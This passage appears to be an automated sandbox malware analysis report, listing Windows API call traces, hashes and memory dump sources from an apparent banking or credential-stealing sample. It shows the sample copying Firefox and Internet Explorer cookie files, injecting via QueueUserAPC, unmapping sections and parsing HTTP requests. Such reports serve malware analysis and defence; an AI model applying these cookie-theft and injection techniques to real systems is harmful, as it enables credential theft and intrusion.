  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
